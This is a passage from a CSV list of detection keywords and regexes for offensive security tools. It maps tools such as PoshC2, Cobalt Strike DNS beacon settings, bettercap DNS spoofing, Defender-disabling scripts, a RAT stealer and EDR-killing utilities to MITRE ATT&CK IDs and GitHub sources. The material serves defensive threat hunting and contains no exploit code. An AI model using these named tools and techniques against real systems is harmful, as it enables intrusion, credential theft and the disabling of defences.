DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*DllNotificationInjection.exe*",".{0,1000}DllNotificationInjection\.exe.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*DllNotificationInjection.sln*",".{0,1000}DllNotificationInjection\.sln.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*DllNotificationInjection.vcxproj*",".{0,1000}DllNotificationInjection\.vcxproj.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*DllNotificationInjection-master*",".{0,1000}DllNotificationInjection\-master.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*dllproxy.py*",".{0,1000}dllproxy\.py.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","15","6","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" "*DllProxy-main*",".{0,1000}DllProxy\-main.{0,1000}","offensive_tool_keyword","DllProxy","Proxy your dll exports and add some spicy content at the same time","T1574.002 - T1036.005","TA0005 - TA0004","N/A","N/A","Exploitation Tools","https://github.com/Iansus/DllProxy/","1","1","N/A","N/A","1","15","6","2023-06-28T14:19:36Z","2021-05-04T19:38:42Z" "*dllsearcher *.dll*",".{0,1000}dllsearcher\s.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*-dll-sideload=*.dll*",".{0,1000}\-dll\-sideload\=.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*DLL-Spoofer-main*",".{0,1000}DLL\-Spoofer\-main.{0,1000}","offensive_tool_keyword","DLL-Spoofer","POC for a DLL spoofer to determine DLL Hijacking","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/MitchHS/DLL-Spoofer","1","1","N/A","9","1","60","7","2023-10-18T14:55:15Z","2023-10-18T14:34:38Z" "*dmcxblue/SharpBlackout*",".{0,1000}dmcxblue\/SharpBlackout.{0,1000}","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","1","N/A","10","1","78","20","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" "*dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE*",".{0,1000}dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","220","38","2024-04-12T21:42:47Z","2020-02-18T12:22:50Z" "*dmg2john.py*",".{0,1000}dmg2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*dnefedniw eteled cs*",".{0,1000}dnefedniw\s\seteled\scs.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*DNet-EnumerateAllDomainUserAccounts*",".{0,1000}DNet\-EnumerateAllDomainUserAccounts.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*DNet-ListAccountsByDescription*",".{0,1000}DNet\-ListAccountsByDescription.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*DNet-ListDomainUserAccountsWithCompletedADDescription*",".{0,1000}DNet\-ListDomainUserAccountsWithCompletedADDescription.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*DNet-ListUsersInDomainAdminsGroup*",".{0,1000}DNet\-ListUsersInDomainAdminsGroup.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","0","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*dnf install tor -y*",".{0,1000}dnf\sinstall\stor\s\-y.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*dngmlblcodfobpdpecaadgfbcggfjfnm*",".{0,1000}dngmlblcodfobpdpecaadgfbcggfjfnm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*dns.lexfo.fr*",".{0,1000}dns\.lexfo\.fr.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*dns.spoof on*",".{0,1000}dns\.spoof\son.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*dns.spoof.address*",".{0,1000}dns\.spoof\.address.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*dns.spoof.all*",".{0,1000}dns\.spoof\.all.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*dns.spoof.domains*",".{0,1000}dns\.spoof\.domains.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*dns.spoof.hosts*",".{0,1000}dns\.spoof\.hosts.{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","1","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "*dns_beacon_beacon*",".{0,1000}dns_beacon_beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_dns_idle*",".{0,1000}dns_beacon_dns_idle.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_dns_sleep*",".{0,1000}dns_beacon_dns_sleep.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_dns_stager_prepend*",".{0,1000}dns_beacon_dns_stager_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_dns_stager_subhost*",".{0,1000}dns_beacon_dns_stager_subhost.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_dns_ttl*",".{0,1000}dns_beacon_dns_ttl.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_get_A*",".{0,1000}dns_beacon_get_A.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_get_TXT*",".{0,1000}dns_beacon_get_TXT.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_maxdns*",".{0,1000}dns_beacon_maxdns.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_ns_response*",".{0,1000}dns_beacon_ns_response.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_put_metadata*",".{0,1000}dns_beacon_put_metadata.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_beacon_put_output*",".{0,1000}dns_beacon_put_output.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*dns_bruteforce.rb*",".{0,1000}dns_bruteforce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - 